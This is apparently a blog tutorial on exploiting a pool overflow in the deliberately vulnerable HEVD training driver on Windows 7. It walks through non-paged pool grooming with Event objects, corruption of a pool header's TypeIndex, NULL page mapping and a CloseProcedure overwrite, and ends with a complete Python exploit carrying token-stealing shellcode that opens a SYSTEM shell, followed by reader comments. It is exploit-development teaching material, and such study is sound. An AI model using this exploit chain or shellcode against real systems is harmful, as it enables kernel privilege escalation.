Overview
We discussed about Write-What-Where vulnerability in the previous part. This part will deal with another vulnerability, Pool Overflow, which in simpler terms, is just an Out-of-Bounds write on the pool buffer. This part could be intimidating and goes really in-depth on how to groom the pool in a way to control the flow of the application reliably everytime to our shellcode, so take your time with this, and try to understand the concepts used before actually trying to exploit the vulnerability.
Again, huge thanks to @hacksysteam for the driver.
Pool Feng-Shui
Before we dig deep into Pool Overflow, we need to understand the basics of pool, how to manipulate it to our needs. A really good read on this topic is available here by Tarjei Mandt. I highly suggest to go through it before continuing further in this post. You need to have a solid understading on the pool concepts before continuing further.
Kernel Pool is very similar to Windows Heap, as it’s used to serve dynamic memory allocations. Just like the Heap Spray to groom the heap for normal applications, in kernel land, we need to find a way to groom our pool in such a way, so that we can predictably call our shellcode from the memory location. It’s very important to understand the concepts for Pool Allocator, and how to influence the pool allocation and deallocation mechanism.
For our HEVD driver, the vulnerable user buffer is allocated in the Non-Paged pool, so we need to find a technique to groom the Non-Paged pool. Windows provides an Event object, which is stored in Non-Paged pool, and can be created using the CreateEvent API:
1 2 3 4 5 6 |
HANDLE WINAPI CreateEvent( _In_opt_ LPSECURITY_ATTRIBUTES lpEventAttributes, _In_ BOOL bManualReset, _In_ BOOL bInitialState, _In_opt_ LPCTSTR lpName ); |
Here, we would need to create two large enough arrays of Event objects with this API, and then, create holes in that allocated pool chunk by freeing some of the Event objects in one of the arrays by using the CloseHandle API, which after coalescing, would combine into larger free chunks:
1 2 3 |
BOOL WINAPI CloseHandle( _In_ HANDLE hObject ); |
In these free chunks, we’d need to insert our vulnerable user buffer in such a way, that it reliably overwrites the correct memory location everytime, as we’d be “corrupting” an adjacent header of the event object, to divert the flow of our execution to our shellcode. A very rough diagram of what we are going to do here should make this a bit more clear (Yeah, I’m a 1337 in paint):
After this, we’d be carefully placing the pointer to our shellcode in such a way, that it could be called by manipulating our corrupted pool header. We’d be faking a OBJECT_TYPE header, carefully overwriting the pointer to one of the procedures in OBJECT_TYPE_INITIALIZER.
Analysis
To analyze the vulnerability, let’s look into the PoolOverflow.c file:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
__try { DbgPrint("[+] Allocating Pool chunk\n"); // Allocate Pool chunk KernelBuffer = ExAllocatePoolWithTag(NonPagedPool, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)POOL_TAG); if (!KernelBuffer) { // Unable to allocate Pool chunk DbgPrint("[-] Unable to allocate Pool chunk\n"); Status = STATUS_NO_MEMORY; return Status; } else { DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG)); DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool)); DbgPrint("[+] Pool Size: 0x%X\n", (SIZE_T)POOL_BUFFER_SIZE); DbgPrint("[+] Pool Chunk: 0x%p\n", KernelBuffer); } // Verify if the buffer resides in user mode ProbeForRead(UserBuffer, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)__alignof(UCHAR)); DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer); DbgPrint("[+] UserBuffer Size: 0x%X\n", Size); DbgPrint("[+] KernelBuffer: 0x%p\n", KernelBuffer); DbgPrint("[+] KernelBuffer Size: 0x%X\n", (SIZE_T)POOL_BUFFER_SIZE); #ifdef SECURE // Secure Note: This is secure because the developer is passing a size // equal to size of the allocated Pool chunk to RtlCopyMemory()/memcpy(). // Hence, there will be no overflow RtlCopyMemory(KernelBuffer, UserBuffer, (SIZE_T)POOL_BUFFER_SIZE); #else DbgPrint("[+] Triggering Pool Overflow\n"); // Vulnerability Note: This is a vanilla Pool Based Overflow vulnerability // because the developer is passing the user supplied value directly to // RtlCopyMemory()/memcpy() without validating if the size is greater or // equal to the size of the allocated Pool chunk RtlCopyMemory(KernelBuffer, UserBuffer, Size); |
This would seem a little more compllicated, but we can clearly see the vulnerability here, as in the last line, the developer is directly passing the value without any validation of the size. This leads to a Vanilla Pool Overflow vulnerability.
We’ll find the IOCTL for this vulnerability as described in the previous post:
1 |
hex((0x00000022 << 16) | (0x00000000 << 14) | (0x803 << 2) | 0x00000003) |
This gives us IOCTL of 0x22200f.
We’ll just analyze the function TriggerPoolOverflow in IDA to see what we can find:
We see a tag of “Hack” as our vulnerable buffer tag, and having a length of 0x1f8 (504). As we have sufficient information about the vulnerability now, let’s jump to the fun part, exploiting it.
Exploitation
Let’s start with our skeleton script, with the IOCTL of 0x22200f.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
import ctypes, sys, struct from ctypes import * from subprocess import * def main(): kernel32 = windll.kernel32 psapi = windll.Psapi ntdll = windll.ntdll hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None) if not hevDevice or hevDevice == -1: print "*** Couldn't get Device Driver handle" sys.exit(-1) buf = "A"*100 bufLength = len(buf) kernel32.DeviceIoControl(hevDevice, 0x22200f, buf, bufLength, None, 0, byref(c_ulong()), None) if __name__ == "__main__": main() |
We are triggering the Pool Overflow IOCTL. We can see the tag ‘kcaH’ and the size of 0x1f8 (504). Let’s try giving 0x1f8 as the UserBuffer Size.
Cool, we shouldn’t be corrupting any adjacent memory right now, as we are just at the border of the given size. Let’s analyze the pool:
We see that our user buffer is perfectly allocated, and just ends adjacent to the next pool chunk’s header:
Overflowing this would be disastrous, and would result in a BSOD/Crash, corrupting the adjacent pool header.
One interesting thing to note here is how we are actually able to control the adjacent header with our overflow. This is the vulnerability that we’d be exploiting by grooming the pool in a predictable manner, derandomising our pool. For this, our previously discusssed CreateEvent API is perfect, as it has a size of 0x40, which could easily be matched to our Pool size 0x200.
We’ll spray a huge number of Event objects, store their handles in arrays, and see how it affects our pool:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
import ctypes, sys, struct from ctypes import * from subprocess import * def main(): kernel32 = windll.kernel32 ntdll = windll.ntdll hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None) if not hevDevice or hevDevice == -1: print "*** Couldn't get Device Driver handle." sys.exit(0) buf = "A"*504 buf_ad = id(buf) + 20 spray_event1 = spray_event2 = [] for i in xrange(10000): spray_event1.append(kernel32.CreateEventA(None, False, False, None)) for i in xrange(5000): spray_event2.append(kernel32.CreateEventA(None, False, False, None)) kernel32.DeviceIoControl(hevDevice, 0x22200f, buf_ad, len(buf), None, 0, byref(c_ulong()), None) if __name__ == "__main__": main() |
Our Event objects are sprayed in the non-paged pool. Now we need to create holes, and re-allocate our vulnerable buffer Hack into the created holes. After reallocating our vulnerable buffer, we’d need to “corrupt” the adjacent pool header in such a way, that it leads to our shellcode. The size of the Event object would be 0x40 (0x38 + 0x8), including the Pool Header.
Let’s analyze the headers:
As we are reliably spraying our Non-Paged pool with Event objects, we can just append these values at the end of our vulnerable buffer and be done with it. But, it won’t work, as these headers have a deeper meaning and needs a minute modification. Let’s dig deep into the headers to see what needs to be modified:
The thing we are interested in this is the TypeIndex, which is actually an offset (0xc) in an array of pointers, which defines OBJECT_TYPE of each object supported by Windows. Let’s analyze that:
This all might seem a little complicated at first, but I have highlighted the important parts:
- The first pointer is 00000000, very important as we are right now in Windows 7 (explained below).
- The next highlighted pointer is 85f05418, which is at the offset of the 0xc from the start
- Analyzing this, we see that this is the Event object type
- Now, the most interesting thing here is the TypeInfo member, at an offset of 0x28.
- Towards the end of this member, there are some procedures called, one can use a suitable procedure from the provided ones. I’d be using the CloseProcedure, located at 0x038.
- The offset for CloseProcedure becomes 0x28 + 0x38 = 0x60
- This 0x60 is the pointer that we’d be overwriting with pointer to our shellcode, and then call the CloseProcedure method, thus ultimately executing our shellcode.
Our goal is to change the TypeIndex offset from 0xc to 0x0, as the first pointer is the null pointer, and in Windows 7, there’s a **flaw** where it’s possible to map NULL pages using the NtAllocateVirtualMemory call:
1 2 3 4 5 6 7 8 |
NTSTATUS ZwAllocateVirtualMemory( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect ); |
And then writing pointer to our shellcode onto the desired location (0x60) using the WriteProcessMemory call:
1 2 3 4 5 6 7 |
BOOL WINAPI WriteProcessMemory( _In_ HANDLE hProcess, _In_ LPVOID lpBaseAddress, _In_ LPCVOID lpBuffer, _In_ SIZE_T nSize, _Out_ SIZE_T *lpNumberOfBytesWritten ); |
Adding all the things discussed above together, our rough script would look like:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
import ctypes, sys, struct from ctypes import * from subprocess import * def main(): kernel32 = windll.kernel32 ntdll = windll.ntdll hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None) if not hevDevice or hevDevice == -1: print "*** Couldn't get Device Driver handle." sys.exit(0) ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(c_void_p(0x1)), 0, byref(c_ulong(0x100)), 0x3000, 0x40) shellcode = "\x90" * 8 shellcode_address = id(shellcode) + 20 kernel32.WriteProcessMemory(0xFFFFFFFF, 0x60, byref(c_void_p(shellcode_address)), 0x4, byref(c_ulong())) buf = "A" * 504 buf += struct.pack("L", 0x04080040) buf += struct.pack("L", 0xEE657645) buf += struct.pack("L", 0x00000000) buf += struct.pack("L", 0x00000040) buf += struct.pack("L", 0x00000000) buf += struct.pack("L", 0x00000000) buf += struct.pack("L", 0x00000001) buf += struct.pack("L", 0x00000001) buf += struct.pack("L", 0x00000000) buf += struct.pack("L", 0x00080000) buf_ad = id(buf) + 20 spray_event1 = spray_event2 = [] for i in xrange(10000): spray_event1.append(kernel32.CreateEventA(None, False, False, None)) for i in xrange(5000): spray_event2.append(kernel32.CreateEventA(None, False, False, None)) for i in xrange(0, len(spray_event2), 16): for j in xrange(0, 8, 1): kernel32.CloseHandle(spray_event2[i+j]) kernel32.DeviceIoControl(hevDevice, 0x22200f, buf_ad, len(buf), None, 0, byref(c_ulong()), None) if __name__ == "__main__": main() |
Now, we just need to call the CloseProcedure, load our shellcode in VirtualAlloc memory, and our shellcode should run perfectly fine. The script below is the final exploit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 |
import ctypes, sys, struct from ctypes import * from subprocess import * def main(): kernel32 = windll.kernel32 ntdll = windll.ntdll hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None) if not hevDevice or hevDevice == -1: print "*** Couldn't get Device Driver handle." sys.exit(0) #Defining the ring0 shellcode and loading it in VirtualAlloc. shellcode = bytearray( "\x90\x90\x90\x90" # NOP Sled "\x60" # pushad "\x64\xA1\x24\x01\x00\x00" # mov eax, fs:[KTHREAD_OFFSET] "\x8B\x40\x50" # mov eax, [eax + EPROCESS_OFFSET] "\x89\xC1" # mov ecx, eax (Current _EPROCESS structure) "\x8B\x98\xF8\x00\x00\x00" # mov ebx, [eax + TOKEN_OFFSET] "\xBA\x04\x00\x00\x00" # mov edx, 4 (SYSTEM PID) "\x8B\x80\xB8\x00\x00\x00" # mov eax, [eax + FLINK_OFFSET] "\x2D\xB8\x00\x00\x00" # sub eax, FLINK_OFFSET "\x39\x90\xB4\x00\x00\x00" # cmp [eax + PID_OFFSET], edx "\x75\xED" # jnz "\x8B\x90\xF8\x00\x00\x00" # mov edx, [eax + TOKEN_OFFSET] "\x89\x91\xF8\x00\x00\x00" # mov [ecx + TOKEN_OFFSET], edx "\x61" # popad "\xC2\x10\x00" # ret 16 ) ptr = kernel32.VirtualAlloc(c_int(0), c_int(len(shellcode)), c_int(0x3000),c_int(0x40)) buff = (c_char * len(shellcode)).from_buffer(shellcode) kernel32.RtlMoveMemory(c_int(ptr), buff, c_int(len(shellcode))) print "[+] Pointer for ring0 shellcode: {0}".format(hex(ptr)) #Allocating the NULL page, Virtual Address Space: 0x0000 - 0x1000. #The base address is given as 0x1, which will be rounded down to the next host. #We'd be allocating the memory of Size 0x100 (256). print "\n[+] Allocating/Mapping NULL page..." null_status = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(c_void_p(0x1)), 0, byref(c_ulong(0x100)), 0x3000, 0x40) if null_status != 0x0: print "\t[+] Failed to allocate NULL page..." sys.exit(-1) else: print "\t[+] NULL Page Allocated" #Writing the ring0 pointer into the location in the mapped NULL page, so as to call the CloseProcedure @ 0x60. print "\n[+] Writing ring0 pointer {0} in location 0x60...".format(hex(ptr)) if not kernel32.WriteProcessMemory(0xFFFFFFFF, 0x60, byref(c_void_p(ptr)), 0x4, byref(c_ulong())): print "\t[+] Failed to write at 0x60 location" sys.exit(-1) #Defining the Vulnerable User Buffer. #Length 0x1f8 (504), and "corrupting" the adjacent header to point to our NULL page. buf = "A" * 504 buf += struct.pack("L", 0x04080040) buf += struct.pack("L", 0xEE657645) buf += struct.pack("L", 0x00000000) buf += struct.pack("L", 0x00000040) buf += struct.pack("L", 0x00000000) buf += struct.pack("L", 0x00000000) buf += struct.pack("L", 0x00000001) buf += struct.pack("L", 0x00000001) buf += struct.pack("L", 0x00000000) buf += struct.pack("L", 0x00080000) buf_ad = id(buf) + 20 #Spraying the Non-Paged Pool with Event Objects. Creating two large enough (10000 and 5000) chunks. spray_event1 = spray_event2 = [] print "\n[+] Spraying Non-Paged Pool with Event Objects..." for i in xrange(10000): spray_event1.append(kernel32.CreateEventA(None, False, False, None)) print "\t[+] Sprayed 10000 objects." for i in xrange(5000): spray_event2.append(kernel32.CreateEventA(None, False, False, None)) print "\t[+] Sprayed 5000 objects." #Creating holes in the sprayed region for our Vulnerable User Buffer to fit in. print "\n[+] Creating holes in the sprayed region..." for i in xrange(0, len(spray_event2), 16): for j in xrange(0, 8, 1): kernel32.CloseHandle(spray_event2[i+j]) kernel32.DeviceIoControl(hevDevice, 0x22200f, buf_ad, len(buf), None, 0, byref(c_ulong()), None) #Closing the Handles by freeing the Event Objects, ultimately executing our shellcode. print "\n[+] Calling the CloseProcedure..." for i in xrange(0, len(spray_event1)): kernel32.CloseHandle(spray_event1[i]) for i in xrange(8, len(spray_event2), 16): for j in xrange(0, 8, 1): kernel32.CloseHandle(spray_event2[i + j]) print "\n[+] nt authority\system shell incoming" Popen("start cmd", shell=True) if __name__ == "__main__": main() |
And we get our usual nt authority\system shell:
Hi, am following your article to understand and write kernel pool overflow exploits in python, I understand till mapping null and even it works for changing value “0xc” to “0x0”. After that, it shows question mark(?) while typing dd 0x00000000 ( Don’t understand this part) Can you please help me in this regard
Thank you in Advance
Question mark would suggest that null page isn’t getting mapped correctly. Are you setting up the breakpoint before the program crashes and analyzing it?
Hello, Thanks for your outstanding work. I’m not good at english…
I think I have understand the post:
[+] pool overflow to control pool header( )
[+] make 0xc to 0 to make the fakedEvent(zero memory is in control, we could put balabala which we want)
[+] replace the CloseProcedure –> shellcode
[+] pwn
However, your exp don’t work on my virtual machine(win7-sp1-x86), I debug it and found that the “event” spary failed… (after “*Hack not “Even””)could give me some tips…
Thank you very much.